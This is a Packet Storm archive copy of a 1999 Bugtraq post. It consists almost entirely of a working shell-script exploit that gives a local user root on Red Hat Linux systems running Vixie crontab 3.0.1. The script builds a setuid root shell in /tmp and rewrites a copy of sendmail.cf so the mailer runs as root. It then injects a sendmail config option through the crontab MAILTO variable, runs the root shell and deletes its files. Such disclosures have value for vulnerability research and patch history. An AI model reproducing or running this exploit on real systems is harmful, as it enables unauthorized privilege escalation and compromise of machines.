crontab_exploit.txt

1999-09-19T00:00:00
ID PACKETSTORM:15658
Type packetstorm
Reporter Packet Storm
Modified 1999-09-19T00:00:00

Description

                                        
                                            `Subject: Vixie Crontab exploit code  
To: BUGTRAQ@SECURITYFOCUS.COM   
  
  
Vixie Crontab exploit code  
  
  
begin vixie-ex  
----------------------------------------------------------------------  
#!/bin/sh  
  
  
  
# Vixie crontab exploit  
#  
# Local user can gain root access.  
#  
# Tested redhat linux : 4.2, 5.0, 5.1, 6.0  
# Tested vixie crontab version : 3.0.1  
#  
# This program is only for demonstrative use only.  
# USE IT AT YOUR OWN RISK!  
#  
# Programmed by Taeho Oh 1999/08/31  
#  
# Taeho Oh ( ohhara@postech.edu ) http://postech.edu/~ohhara  
# PLUS ( Postech Laboratory for Unix Security ) http://postech.edu/plus  
# PosLUG ( Postech Linux User Group ) http://postech.edu/group/poslug  
  
  
  
PATH=/bin:/sbin:/usr/bin:/usr/sbin:/usr/local/bin:/usr/local/sbin  
export PATH  
  
  
  
echo  
echo "Taeho Oh ( ohhara@postech.edu ) http://postech.edu/~ohhara"  
echo "PLUS ( Postech Laboratory for Unix Security ) http://postech.edu/plus"  
echo "PosLUG ( Postech Linux User Group ) http://postech.edu/group/poslug"  
echo  
  
  
  
echo make shell  
echo  
cat > /tmp/sh.c << EOF  
#include<unistd.h>  
#include<stdlib.h>  
int main()  
{  
setuid(0);  
setgid(0);  
execl("/bin/sh","sh",0);  
return 0;  
}  
EOF  
echo compile shell  
echo  
cc -o /tmp/sh /tmp/sh.c || gcc -o /tmp/sh /tmp/sh.c  
  
  
  
echo make execute shell script  
echo  
cat > /tmp/makesh << EOF  
#!/bin/sh  
chown root /tmp/sh  
chgrp root /tmp/sh  
chmod 4755 /tmp/sh  
EOF  
chmod 755 /tmp/makesh  
  
  
  
echo hack sendmail.cf  
echo  
cp -f /etc/sendmail.cf /tmp/sendmail.cf.tmp1  
sed 's/O DefaultUser=8:12/O DefaultUser=0:0/g' /tmp/sendmail.cf.tmp1 > /tmp/sendmail.cf  
sed 's/P=\/usr\/bin\/procmail/P=\/tmp\/makesh/g' /tmp/sendmail.cf.tmp1 > /tmp/sendmail.cf.tmp2  
sed 's/A=procmail/A=makesh/g' /tmp/sendmail.cf.tmp2 > /tmp/sendmail.cf.tmp3  
cp /tmp/sendmail.cf.tmp3 /tmp/sendmail.cf  
rm -f /tmp/sendmail.cf.tmp1  
rm -f /tmp/sendmail.cf.tmp2  
rm -f /tmp/sendmail.cf.tmp3  
  
  
  
echo make cron file  
echo  
cat > /tmp/cronfile << EOF  
MAILTO=-C/tmp/sendmail.cf `whoami`  
* * * * * ls  
EOF  
echo input cron file  
echo  
crontab /tmp/cronfile  
  
  
  
echo wait for 1 minute  
echo  
sec=`date +%S`  
wait=`expr 65 - $sec`  
sleep $wait  
  
  
  
echo execute shell  
echo  
/tmp/sh  
  
  
  
echo delete data files  
echo  
cd /tmp  
rm -f sendmail.cf cronfile makesh sh.c  
crontab /dev/null  
----------------------------------------------------------------------  
end vixie-ex  
  
  
--  
  
  
Taeho Oh ( ohhara@postech.edu ) http://postech.edu/~ohhara  
PLUS ( Postech Laboratory for Unix Security ) http://postech.edu/plus  
PosLUG ( Postech Linux User Group ) http://postech.edu/group/poslug  
`